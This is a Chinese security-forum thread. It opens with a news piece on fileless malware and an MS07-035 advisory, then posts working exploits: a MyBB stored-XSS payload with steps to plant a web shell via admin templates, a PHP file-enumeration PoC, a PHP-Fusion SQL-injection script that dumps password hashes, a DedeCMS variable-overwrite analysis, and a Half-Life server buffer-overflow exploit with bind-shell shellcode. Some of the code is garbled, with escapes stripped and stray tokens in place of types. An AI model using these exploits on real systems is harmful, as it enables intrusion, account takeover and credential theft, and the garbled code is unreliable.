最近看过此主题的会员

返回列表 发帖

研究人员发现新型“无文件”恶意软件

研究人员日前发现了一种极其罕见,也可能是独一无二的“无文件”恶意软件,该恶意软件不需要在受感染电脑的硬盘上存储任何文件,完全在内存中运行。

这一最新发现是由Kaspersky实验室完成的,该实验室收到了一种恶意软件攻击一个常用Java漏洞的报告,这些攻击报告来自俄罗斯的一些网站,但似乎没有像传统特洛伊攻击那样留下任何文件痕迹。

实际上,这次攻击是从一个嵌入受感染网站的iFrame上运行Javascript,然后将加密的.dll负载直接注入Javaw.exe进程。

这个非常寻常的恶意软件的目的看起来是双重的:首先是让Windows的用户账号控制(UAC)失效,其次是像一个“pathfinder”一样设置一个可用命令操控的僵尸,通过它接收指令去控制服务器,期间还包括要在受感染的电脑上安装Lurk数据盗窃木马。

这次攻击的不足之处是,用户只需要重启电脑就可以将其从内存中清除,只是这一过程有可能还会受到新的感染。但是反过来说,正是由于这种不足,所以它也极难被发现。它在目标PC上不会存储文件,首先是不会更改任何文件。如果被攻击目标没有打补丁,那么安全软件很不容易探测到它。

使用Java也让这个病毒可以跨平台运行,可以攻击PC、Mac和Linux电脑,虽然目前记录到的特洛伊攻击只能在Windows电脑上运行。

Kaspersky还提醒我们说,这个新型恶意软件会让我们想起十年前非常有名的红色代码和Slammer病毒,这些病毒的构造都很简单,但传播速度却非常之快,因为它们都是利用缓冲区溢出来攻击特定微软程序的,同样不需要文件传播。

“根据我们对Lurk用来跟命令服务器进行通信的协议的分析,我们已可以确定,在过去数月时间内,这些服务器已经处理了来自多达30万台受感染电脑的请求,”Kaspersky研究人员Sergey Golovanov说。

 

您可能还想看的主题:

Android系统再现木马,变身驱动程式袭击用户

腾讯招聘业务安全工程师

windows SDK 系列课程全套

简单web服务器文件管理5.3缓冲区溢出

记一次曲折的渗透和另类的提权

安全宝招聘安全服务工程师

PHP 5.4 (5.4.3) Code Execution (Win32)

马化腾:Android时代将存在安全危机

Quick Heal Firewall Pro3.0

windows server 2008做NTP服务器

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

MS07-035:Win 32 API 中的允许远程执行代码漏洞
发布日期: 六月 12, 2007版本: 1.0
摘要:
此关键安全更新可消除 Win32 API 中秘密报告的漏洞。 如果特制应用程序本地使用受影响的 API,此漏洞可能允许远程执行代码或特权提升。 因此,使用此 Win32 API 组件的应用程序可以用作此漏洞的媒介。 例如,Internet Explorer 在分析特制网页时使用此 Win32 API 函数。
这是用于 Windows 2000、Windows XP 和 Windows Server 2003 所有受支持的版本的关键安全更新。
此安全更新通过更改 Win32 API 验证参数的方式来解决漏洞。
建议。 Microsoft 建议用户立即应用此更新。
已知问题。 无
受影响的软件
操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows 2000 Service Pack 4 远程执行代码 严重 MS06-051 Windows XP Service Pack 2 远程执行代码 严重 MS06-051 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-051 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-051 Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2 远程执行代码 严重 MS06-051 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-051
不受影响的软件
操作系统 Windows Vista Windows Vista x64 Edition
微软的安全公告:
http://www.microsoft.com/china/technet/security/bulletin/MS07-035.mspx
(以上链接均连到第三方网站)


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MyBB 1.8.12 存储性 XSS漏洞
MyBB (versions 1.8.12 and prior at time of writing this) is vulnerable to a cross site scripting bug which would
allow a moderator to take over an administrator's account. In addition to this, it is also possible to perform file
enumeration in the instances where it is not possible to spawn a shell. This can be used in conjunction with
the FPD and other bugs in order to evelate the level of access and map out a potential attack surface.

-------------------------------------------------------------------------------------------------------------
Cross-Site Scripting:
-------------------------------------------------------------------------------------------------------------
A moderator or administrator can make an announcement, and can inject JavaScript into this.
MyBB however says:
> Should HTML be parsed in the announcement? (Javascript is removed)
> Source: https://docs.mybb.com/1.6/Mod-CP-Forums-Posts/#Adding.2FEditing_an_Announcement

<script> tags are stripped from the content but you can simply use generic HTML tags with event
handlers in order to trigger javascript, for example:

<svg/onload="document.write('hi');">

When a user views the thread, the javascript will execute.
Since a moderator can post these threads, they can craft a payload that would allow them to hijack
the cookies for an admin account or create a fake login page via document.write which would hopefully
trick an admin into re-authenticating (giving up their credentials) when attempting to view the thread.

This is a stored/persistent attack and anyone who views the thread will be hit with the payload.

Once you have gained an admin account, it is generally pretty trivial to get shell access.
There is a method that has worked for years and will work in most cases:

- From AdminCP, Navigate to 'Templates and Styles'
- Determine the MyBB Theme currently in use
- Navigate to 'Templates'
- Open Templates used by the current theme
- Select 'calendar templates'
- Click 'calendar' then paste code to your shell and save
- Navigate to http://[HOST]/calendar.php to access your shell

In the instance that you can't get a shell, then File Enumeration can still be performed as seen below:

-------------------------------------------------------------------------------------------------------------
Full Path Disclosure:
-------------------------------------------------------------------------------------------------------------
Almost all the parameters are vulnerable to this, but this is an example of one:
  http://[HOST]/mybb/admin/index.php?module[]


In older versions of MyBB, It's possible to get FPD (and also some PHP configuration info outputted) without
requiring ACP access, this can be done via insertion of an array into the 'sid' get parameter.
Example:

http://[HOST]/search.php?action=results&amp;sid[]=YourSessionID&amp;sortby=&amp;order=desc


-------------------------------------------------------------------------------------------------------------
File Enumeration:
-------------------------------------------------------------------------------------------------------------
File enumeration can be performed, allowing an attacker to search for the existence of vulnerable plugins, locate
paths to config files, etc.

We'll enumerate files by changing the theme file to a file we want. If the file exists, it will not give an error.
If the file does not exists, it'll throw an error.

A working Proof-of-Concept (written in PHP) is given here:
-------------------------------------------------------------------------------------------------------------
<?php
  //////////////////////////////////////////////////////// PROJECT  INSECURITY ////////////////////////////////////////////////////////
  # Your cookies
  $cookies = "acploginattempts=; adminsid=; mybbuser=; collapsed=; mybb[lastvisit]=; mybb[lastactive]=; loginattempts=; _ga=; sid=";

  # Your 'postkey'
  $post_key = "";

  # Target URL
  $url = "http://localhost/mybb/";

  # The file to enumerate
  $file = "index.php";

  # How many paths you wanna go back
  $amount = 10;

  # Proxy information
  $enable_proxy = 0;
  $proxy_info   = "127.0.0.1:9150";

  //////////////////////////////////////////////////////// PROJECT  INSECURITY ////////////////////////////////////////////////////////

  function post( $url, $post_key, $cookies, $file, $proxy_info, $proxy )
  {
    $post_data = http_build_query( array(
      "my_post_key"     => "{$post_key}",
      "tid"             => "5",
      "name"            => "insecurity",
      "pid"             => "1",
      "templateset"     => "1",
      "editortheme"     => "{$file}"
    ));

    $headers = array( "Cookie: {$cookies}" );

      $cURL = curl_init( "{$url}/admin/index.php?module=style-themes&amp;action=edit" );

      curl_setopt( $cURL, CURLOPT_POST, true );
      curl_setopt( $cURL, CURLOPT_HTTPHEADER, $headers );
      curl_setopt( $cURL, CURLOPT_POSTFIELDS, $post_data );
      curl_setopt( $cURL, CURLOPT_RETURNTRANSFER, true );

      if( $proxy == 1 )
      {
        # Edit this if you wanna use your own proxy
        curl_setopt( $cURL, CURLOPT_PROXY, $proxy_info );
      }

      $response = curl_exec( $cURL );
      curl_close( $cURL );

      return $response;
  }

  for ( $i = 0; $i < $amount; $i++ )
  {
    $path = str_repeat("../", $i);

    $result = post( $url, $post_key, $cookies, ( $path . $file ), $proxy_info, $enable_proxy );

    if( !preg_match( '/<div class="error">(.*?)</div>/s', $result ) )
    {
      $found = true;
      break;
    }
  }

  if ( isset( $found ) )
    print "<b>{$file}</b> does exist.";
  else
    print "<b>{$file}</b> does not exist.";

?>



















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

PHP-Fusion 2.x SQL 注射漏洞
<?phpprint_r("/*********************************************************      Expanded Calendar 2.x (PHP-Fusion module)        **      User pass disclosure exploit                     **      Found by Matrix86 of Rbt-4 Crew                  **      Site: www.rbt-4.net                              **      Mail: info[at]rbt-4[dot]net                      *********************************************************** Bug found in                                          **      /infusions/calendar_events_panel/show_single.php ** Line:                                                 **      27                                               ** Vulnerability type: Sql injection                     ** Unpatched!                                            ** Patch:                                                ** Line 26:                                              ** if(!isset($sel)||!isNum($sel)) fallback("index.php");*********************************************************/");if($argc < 4) die("Usage: ".$argv[0]." [site] [path] [user_id]
Example: ".$argv[0]." localhost /php-fusion/ 1
");ini_set("max_execution_time",0);ini_set("default_socket_timeout",4);$host    = $argv[1];$path    = $argv[2];$user_id = $argv[3];$port    = 80;$sqlinit = "infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=";$sqlend = "/*";function send($req){global $host,$port;$ip = gethostbyname($host);if(stristr($host,$ip)) die("Error: Host not found
");if(!($sock = fsockopen($ip,$port))) die("Error: unable open sock!
");fputs($sock,$req);$response = "";while (!feof($sock)) {$response .= fgets ($sock,128);}fclose ($sock);return $response;}$packet = "GET ".$path.$sqlinit.$user_id.$sqlend." HTTP/1.0
";$packet.= "User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.7 (like Gecko)
";$packet.= "Host: ".$host."
";$packet.="Connection: Close

";echo "Packet:
".$packet."

";$resp = send($packet);$temp  = explode("<td colspan='2'><font size='4'><u>",$resp);$temp2 = explode("<td colspan='3' style='border-style: solid; border-width: 1px; padding-left: 4px; padding-right: 4px; padding-top: 1px; padding-bottom: 1px'><font style='font-size: 11px'>",$temp[1]);$temp3 = explode("</td>",$temp2[1]);$username = $temp3[0];if(isset($temp[1])) {$md5 = substr($temp[1],0,32);echo "Id user:  ".$user_id."
Username: ".$username."
Password: ".$md5."
";}else echo("Bug Fixed..sorry!
");exit();?>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

DedeCMSV53任意变量覆盖最新漏洞
<TABLE class="tab-content table-break" cellSpacing=0 cellPadding=0>



DedeCMSV53任意变量覆盖漏洞


BY flyh4t 2008-12-12 DedeCMSV53发布了,但是依旧没有将变量覆盖漏洞彻底修补。这个漏洞和ryat那个很相似 :) 看核心文件include/common.inc.php中的代码 //检查和注册外部提交的变量 foreach($_REQUEST as $_k=>$_v) {     if( strlen($_k)>0 &amp;&amp; eregi('^(_|cfg_|GLOBALS)',$_k) &amp;&amp; !isset($_COOKIE[$_k]) )//程序员逻辑混乱了?     {         exit('Request var not allow!');     } }这个地方可以通过提交_COOKIE变量绕过cfg_等关键字的过滤 接着是注册变量的代码 foreach(Array('_GET','_POST','_COOKIE') as $_request) {     foreach($$_request as $_k => $_v) ${$_k} = _RunMagicQuotes($_v); }然后初始化变量 //数据库配置文件 require_once(DEDEDATA.'/common.inc.php'); //系统配置参数 require_once(DEDEDATA."/config.cache.inc.php");看似不能利用了,但是幸运的是在文件最后有这样一段代码 //转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数 if($_FILES) {     require_once(DEDEINC.'/uploadsafe.inc.php'); }再看uploadsafe.inc.php给我们提供了什么 $keyarr = array('name','type','tmp_name','size'); foreach($_FILES as $_key=>$_value) {     foreach($keyarr as $k)     {         if(!isset($_FILES[$_key][$k]))         {             exit('Request Error!');         }     }     $$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\","\",$_FILES[$_key]['tmp_name']);              //注意这个地方,通过common.inc.php的漏洞,我们是可以控制$_FILES[$_key]['tmp_name'] 的这里通过提交类似common.inc.php?_FILES[cfg_xxxx][tmp_name] =aaaaaa&amp;……来覆盖cfg_xxxx 利用的时候注意给cookie赋值,同时要绕过uploadsafe.inc.php里面的一些判断 </TABLE>


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Half-Life服务器3.1.1.0远程缓冲区溢出利用
/****************************************************************** hoagie_hlserver.c** Remote exploit for Halflife-Servers.** Binds a shell to port 30464/tcp and connects to it.** Author: KnbykL <info@knbykl.org>** Thnx : All Soldier HbT*  * This hole was found by Auriemma Luigi.* Uses code from the proof-of-concept DoS-exploit by Auriemma Luigi.** Tested with HL-Server v3.1.1.0. Works only with the Linux server* (though making a Win32-exploit should be trivial)** How this exploit works:* There is a buffer on the stack that is being overwritten with* our supplied shellcode. Too bad that it lies on an address that* has 0xFF in it (e.g. 0xbfffe000) and half life filters these* characters out, so we can't write the address of the shellcode* there.  * Luckily, the function that copies the shellcode into the buffer* has the address of the buffer in %eax when it exits. So, we jump  * to the location 0x0804AE93 (which is the same in ALL half life* servers, thanks to the fact that it is a binary distrubtion)* where the instruction "call *%eax" is located. And so the shellcode* gets executed...** Dil : Türk&ccedil;e'min her zaman arkas&yacute;nday&yacute;m.*     * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.* THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR* CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.******************************************************************/#include    <stdio.h>#include    <stdlib.h>#include    <string.h>#include    <time.h>#include    <unistd.h>#include    <sys/socket.h>#include    <sys/types.h>#include    <arpa/inet.h>#include    <netdb.h>#define VER         "0.1"#define BUFFSZ      4096#define PORT        27015#define INFO        "xffxffxffxff"                     "infostring
"#define GETCH       "xffxffxffxff"                     "getchallenge
"#define TIMEOUT     5    /* 5 seconds */#define PICOFFSET 0xD0404// 13*13+5=174// 5*16+13+43+7*16+12=260// 260-174 = 86 NOPs = 6*13+8#define PAYLOAD    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90x90x90x90x90x90x90x90x90x90"                    "x90x90x90x90"                    "x31xc0x40x40xcdx80x89xc0x85xc0x74x06x31"                    "xc0xb0x01xcdx80x31xc0x31xdbx31xc9x31xd2"                    "xb0x66xb3x01x51xb1x06x51xb1x01x51xb1x02"                    "x51x8dx0cx24xcdx80xb3x02xb1x02x31xc9x51"                    "x51x51x80xc1x77x66x51xb1x02x66x51x8dx0c"                    "x24xb2x10x52x51x50x8dx0cx24x89xc2x31xc0"                    "xb0x66xcdx80xb3x01x53x52x8dx0cx24x31xc0"                    "xb0x66x80xc3x03xcdx80x31xc0x50x50x52x8d"                    "x0cx24xb3x05xb0x66xcdx80x89xc3x31xc9x31"                    "xc0xb0x3fxcdx80x41x31xc0xb0x3fxcdx80x41"                    "x31xc0xb0x3fxcdx80x31xdbx53x68x6ex2fx73"                    "x68x68x2fx2fx62x69x89xe3x8dx54x24x08x31"                    "xc9x51x53x8dx0cx24x31xc0xb0x0bxcdx80x31"                    "xc0xb0x01xcdx80" /* EIP */          "%c%c%c%c%c%c%c%c%c%c%c%c"                 // "BBBB"/* PAYLOAD is 268 bytes! */#define MODEL       "robo"#define NAME        "]I[gore"#define TOPCOLOR    "25"    /* 0-255, it's NOT important */#define BOTTOMCOLOR "161"    /* 0-255, it's NOT important */#define BOF1        "xffxffxffxff"                     "connect %d"                     " %s ""                     "\prot\2"                     "\unique\-1"                     "\raw\%08lx%08lx%08lx%08lx"                     "" ""                     "\model\" MODEL                     "\topcolor\" TOPCOLOR                     "\bottomcolor\" BOTTOMCOLOR                     "\rate\9999.000000"                     "\cl_updaterate\20"                     "\cl_lw\1"                     "\cl_lc\1"                     "\cl_dlmax\128"                     "\hud_classautokill\1"                     "\name\" NAME                     "\" PAYLOAD "\value"                     ""
"#define BUGNUM      "" int exec_sh(int sockfd){        char snd[4096],rcv[4096];        fd_set rset;        while(1)        {                FD_ZERO(&amp;rset);                FD_SET(fileno(stdin),&amp;rset);                FD_SET(sockfd,&amp;rset);                select(255,&amp;rset,NULL,NULL,NULL);                if(FD_ISSET(fileno(stdin),&amp;rset))                {                        memset(snd,0,sizeof(snd));                        fgets(snd,sizeof(snd),stdin);                        write(sockfd,snd,strlen(snd));                }                if(FD_ISSET(sockfd,&amp;rset))                {                        memset(rcv,0,sizeof(rcv));                        if(read(sockfd,rcv,sizeof(rcv))<=0)                                exit(0);                        fputs(rcv,stdout);                }        }}int connect_sh(char *server){        int sockfd,i;        struct sockaddr_in sin;    struct hostent *he;        printf("Connect to the shell
");        fflush(stdout);        memset(&amp;sin,0,sizeof(sin));        sin.sin_family=AF_INET;        sin.sin_port=htons(30464);    if((he=gethostbyname(server))<0) perror("gethostbyname"), exit(1);    memcpy(&amp;sin.sin_addr,*(he->h_addr_list),sizeof(sin.sin_addr));        if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)        {                printf("Can't create socket
");                exit(0);        }        if(connect(sockfd,(struct sockaddr *)&amp;sin,sizeof(sin))<0)        {                printf("Can't connect to the shell
");                exit(0);        }        return sockfd;}int getproto(unsigned char *buff);int timeout2(int sock);kene showinfostring(unsigned char *buff, int size);u_long resolv(char *host);kene std_err(kene);int main(int argc, char *argv[]) {    unsigned char    buffrecv[BUFFSZ],                    buffsend[sizeof(BOF1) + 64],                    challenge[16],                    bug,                    *bofstr,                    *stri,                    *strf;    struct    sockaddr_in     peer;    int             sd,                    err,                    rlen,                    bufflen,                    proto;    unsigned long offset;    setbuf(stdout, NULL);    if(argc < 2) {        printf("
Usage: %s <host> <port>

", argv[0], PORT);        exit(1);    }    printf("OK team, follow my command.
");    srand(time(NULL));    bofstr=BOF1;    peer.sin_addr.s_addr = resolv(argv[1]);    peer.sin_port = htons(atoi(argv[2]));    // offset=strtoul(argv[3],NULL,16);    peer.sin_family      = AF_INET;    rlen                 = sizeof(peer);    offset=0x0804AE93;   // call eax    printf("Using offset 0x%08x...
",offset);    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);    if(sd < 0) std_err();        /* GET INFORMATIONS */    err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&amp;peer, rlen);    if(err < 0) std_err();    err = timeout2(sd);    if(err < 0) {        fputs("
Error: socket timeout
", stdout);        exit(1);    }    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&amp;peer, &amp;rlen);    if(err < 0) std_err();    buffrecv[err] = 0x00;    proto = getproto(buffrecv);    showinfostring(buffrecv, err);        /* GET CHALLENGE NUMBER */    err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&amp;peer, rlen);    if(err < 0) std_err();    err = timeout2(sd);    if(err < 0) {        fputs("
Error: socket timeout
", stdout);        exit(1);    }    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&amp;peer, &amp;rlen);    if(err < 0) std_err();    buffrecv[err] = 0x00;    stri = strchr(buffrecv, 0x20);    if(!stri) stri = buffrecv;    strf = strchr(stri + 1, 0x20);    if(!strf) strf = buffrecv + err;    *strf = 0x00;    strncpy(challenge, stri, 16);    printf("Challenge: %s
", challenge);    bufflen = snprintf(buffsend,            sizeof(BOF1) + 64,            bofstr,            proto,            challenge,            (long)(rand() << 1) + (rand() &amp; 0xf),    /* 31bit */            (long)(rand() << 1) + (rand() &amp; 0xf),            (long)(rand() << 1) + (rand() &amp; 0xf),            (long)(rand() << 1) + (rand() &amp; 0xf),        offset&amp;0xFF,(offset>>8)&amp;0xFF,(offset>>16)&amp;0xFF,(offset>>24)&amp;0xFF,        offset&amp;0xFF,(offset>>8)&amp;0xFF,(offset>>16)&amp;0xFF,(offset>>24)&amp;0xFF,        offset&amp;0xFF,(offset>>8)&amp;0xFF,(offset>>16)&amp;0xFF,(offset>>24)&amp;0xFF);    if(bufflen < 0) {        fputs("
Error: cannot allocate buffer in memory
", stdout);        exit(1);    }    printf("Sending deadly packet ... stand by
");    err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&amp;peer, rlen);    if(err < 0) std_err();    err = timeout2(sd);    if(err < 0) {        fputs("
Result: The remote server IS vulnerable!!!
", stdout);        exec_sh(connect_sh(argv[1]));        return(0);    }    err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&amp;peer, &amp;rlen);    if(err < 0) std_err();    buffrecv[err] = 0x00;    printf("Connect: %s
", buffrecv + 5);    close(sd);    fputs("
Result: The server doesn't seems to be vulnerable

", stdout);    return(0);}int getproto(unsigned char *buff) {    int        p;    unsigned char    *ptr;    ptr = strstr(buff + 23, "protocol");    if(ptr) {        p = atoi(ptr + 9);    } else {        fputs("
Error: No protocol informations in the answer of the server
", stdout);        exit(1);    }    return(p);}     kene showinfostring(unsigned char *buff, int size) {    int        nt = 1,            len;    unsigned char    *string;    fputs("
--------------------------------------------------
", stdout);    if(memcmp(buff + 1, "xffxffxff", 3)) {        fputs("
Error: Bad answer from the server (it is not a true server)
", stdout);        exit(1);    }    len = strlen(buff);    if(len < size) buff += len + 1;    while(1) {        string = strchr(buff, '\');        if(!string) break;        *string = 0x00;        /*
or          */        if(!nt) {            printf("%s: ", buff);            nt++;        } else {            printf("%s
", buff);            nt = 0;        }        buff = string + 1;    }    printf("%s
", buff);}int timeout2(int sock) {    struct    timeval    timeout;    fd_set    fd_read;    int    err;    timeout.tv_sec = TIMEOUT;    timeout.tv_usec = 0;    FD_ZERO(&amp;fd_read);    FD_SET(sock, &amp;fd_read);    err = select(sock + 1, &amp;fd_read, NULL, NULL, &amp;timeout);    if(err < 0) std_err();    if(err == 0) return(-1);    return(0);}u_long resolv(char *host) {    struct        hostent    *hp;    u_long        host_ip;    host_ip = inet_addr(host);    if(host_ip == INADDR_NONE) {        hp = gethostbyname(host);        if(!hp) {            printf("
Error: Unable to resolve hostname (%s)
", host);            exit(1);        } else host_ip = *(u_long *)(hp->h_addr);    }    return(host_ip);}kene std_err(kene){        perror("
Error");        exit(1);}


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表